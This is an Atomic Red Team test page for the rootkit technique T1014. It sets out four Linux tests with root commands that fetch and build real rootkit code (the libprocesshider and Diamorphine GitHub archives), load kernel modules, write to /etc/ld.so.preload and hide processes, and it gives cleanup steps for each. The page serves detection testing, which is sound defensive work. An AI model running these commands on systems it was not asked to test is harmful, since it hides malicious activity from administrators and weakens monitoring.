Try it using Invoke-Atomic

Rootkit

Description from ATT&CK

Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)

Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or System Firmware. (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)

Atomic Tests

Atomic Test #1 - Loadable Kernel Module based Rootkit

Loadable Kernel Module based Rootkit

Supported Platforms: linux

auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553

Inputs:

Name Description Type Default Value
rootkit_source_path Path to the rootkit source. Used when prerequisites are fetched. path PathToAtomicsFolder/T1014/src/Linux
rootkit_path Path To rootkit string PathToAtomicsFolder/T1014/bin
rootkit_name Module name string T1014

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2

sudo insmod #{rootkit_path}/#{rootkit_name}.ko

Cleanup Commands:

1
2
3

sudo rmmod #{rootkit_name}
sudo rm -rf #{rootkit_path}

Dependencies: Run with bash!

Description: The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko)

Check Prereq Commands:

1
2

if [ -f #{rootkit_path}/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
3
4
5
6
7
8
9

sudo apt install make
sudo apt install gcc
if [ ! -d /tmp/T1014 ]; then mkdir /tmp/T1014; fi;
cp #{rootkit_source_path}/* /tmp/T1014/
cd /tmp/T1014; make
mkdir #{rootkit_path}
mv /tmp/T1014/#{rootkit_name}.ko #{rootkit_path}/#{rootkit_name}.ko
rm -rf /tmp/T1014

Atomic Test #2 - Loadable Kernel Module based Rootkit

Loadable Kernel Module based Rootkit

Supported Platforms: linux

auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f

Inputs:

Name Description Type Default Value
rootkit_source_path Path to the rootkit source. Used when prerequisites are fetched. path PathToAtomicsFolder/T1014/src/Linux
rootkit_name Module name string T1014

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2

sudo modprobe #{rootkit_name}

Cleanup Commands:

1
2
3
4

sudo modprobe -r #{rootkit_name}
sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko
sudo depmod -a

Dependencies: Run with bash!

Description: The kernel module must exist on disk at specified location (#{rootkit_source_path}/#{rootkit_name}.ko)

Check Prereq Commands:

1
2

if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
3
4
5
6
7
8
9

sudo apt install make
sudo apt install gcc
if [ ! -d /tmp/T1014 ]; then mkdir /tmp/T1014; touch /tmp/T1014/safe_to_delete; fi;
cp #{rootkit_source_path}/* /tmp/T1014
cd /tmp/T1014; make        
sudo cp /tmp/T1014/#{rootkit_name}.ko /lib/modules/$(uname -r)/
[ -f /tmp/T1014/safe_to_delete ] && rm -rf /tmp/T1014
sudo depmod -a

Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)

Uses libprocesshider to simulate rootkit behavior by hiding a specific process name via ld.so.preload (see also T1574.006).

Supported Platforms: linux

auto_generated_guid: 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3

Inputs:

Name Description Type Default Value
repo Url of the github repo zip string https://github.com/gianlucaborello/libprocesshider/
rev Revision of the github repo zip string 25e0587d6bf2137f8792dc83242b6b0e5a72b415
library_path Full path of the library to add to ld.so.preload string /usr/local/lib/libprocesshider.so

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
3

echo #{library_path} | tee -a /etc/ld.so.preload
/usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"

Cleanup Commands:

1
2
3

sed -i "\:^#{library_path}:d" /etc/ld.so.preload
rm -rf #{library_path} /usr/local/bin/evil_script.py /tmp/atomic

Dependencies: Run with bash!

Description: The preload library must exist on disk at specified location (#{library_path})

Check Prereq Commands:

1
2

if [ -f #{library_path} ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
3
4
5
6

mkdir -p /tmp/atomic && cd /tmp/atomic
curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd libprocesshider-#{rev}
make
cp libprocesshider.so #{library_path}
cp /usr/bin/ping /usr/local/bin/evil_script.py

Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)

Loads Diamorphine kernel module, which hides itself and a processes.

Supported Platforms: linux

auto_generated_guid: 0b996469-48c6-46e2-8155-a17f8b6c2247

Inputs:

Name Description Type Default Value
repo Url of the diamorphine github repo string https://github.com/m0nad/Diamorphine/
rev Revision of the github repo zip string 898810523aa2033f582a4a5903ffe453334044f9
rootkit_name Module name string diamorphine

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
3
4
5
6

sudo modprobe #{rootkit_name}
ping -c 10 localhost >/dev/null & TARGETPID="$!"
ps $TARGETPID
kill -31 $TARGETPID
ps $TARGETPID || echo "process ${TARGETPID} hidden"

Cleanup Commands:

1
2
3
4
5

kill -63 1
sudo modprobe -r #{rootkit_name}
sudo rm -rf /lib/modules/$(uname -r)/#{rootkit_name}.ko /tmp/atomic
sudo depmod -a

Dependencies: Run with bash!

Description: The kernel module must exist on disk at specified location (#{rootkit_name}.ko)

Check Prereq Commands:

1
2

if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
3
4
5
6

mkdir -p /tmp/atomic && cd /tmp/atomic
curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd Diamorphine-#{rev}
make
sudo cp #{rootkit_name}.ko /lib/modules/$(uname -r)/
sudo depmod -a

source